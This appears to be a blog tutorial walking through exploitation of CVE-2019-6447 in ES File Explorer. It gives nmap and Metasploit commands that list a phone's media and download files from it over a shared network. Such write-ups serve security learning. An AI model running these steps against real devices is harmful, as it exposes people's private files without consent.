ES File Explorer Open Port Vulnerability exploitation
ES File Explorer (File Manager) is a full-featured file (Images, Music, Movies, Documents, app) manager for both local and networked use! With over 500 million users worldwide, ES File Explorer (File Manager) helps manage your android phone and files efficiently and effectively and share files without data cost.
In Jan. 2019, a security researcher released a security vulnerability in ES File Explorer (CVE-2019–6447).
This works on version v4.1.9.7.4. Allows the attackers on the same network to execute applications, read files and sensitive personal data. The application leaves TCP port 59777 open during runtime and responds to counterfeit requests over http.
To perform this exploitation you need:
- Kali Linux or any Linux distro
- Msfconsole
- Target mobile should have installed ES file explorer version 4.1.9.7.4
- Both attacker and the victim should be on same network
- Also app must be running so that port 59777 remains open
Every time when a user is launching the app, a HTTP server is started. This server is opening locally the port 59777:
you can nmap to target and see if the port is open;
nmap -p 59777 192.168.1.1
if you have trouble finding your IP, see above image.
start metasploit framework;
msfconsolesearch for es_file exploit;
msf6 > search es_file
select the exploit module;
msf6 > use auxiliary/scanner/http/es_file_explorer_open_portshow options to check available options;
msf6 > show options
you see the remote host (RHOSTS) isn’t specified, so set the RHOSTS as your target mobile’s IP address;
msf6 > set RHOSTS 192.168.1.1
now run the exploit;
msf6 > run
you can see the details of your mobile.
show actions to list all the available actions;
msf6 > show actions
set the action to list anything you want, in this case i’ll set it to ‘LISTVIDEOS’
msf6 > set action LISTVIDEOS
now we are all set, give run command;
msf6 > run
you can see all the audio files listed on my mobile.
now if you want, we can download any file.
you need to set action to GETFILE;
msf6 > set action GETFILE
and set ACTIONITEM to the filename with path you want to download from the available list you have found in previous step;
msf6 > set ACTIONITEM /pathto/123.mp3
now run the exploit;
msf6 > run
that’s it now you have successfully downloaded a file from the victim’s mobile!!!.
watch this video for step by step guide;
If you liked this article please leave me a clap or two.
From Infosec Writeups: A lot is coming up in the Infosec every day that it’s hard to keep up with. Join our weekly newsletter to get all the latest Infosec trends in the form of 5 articles, 4 Threads, 3 videos, 2 Github Repos and tools, and 1 job alert for FREE!
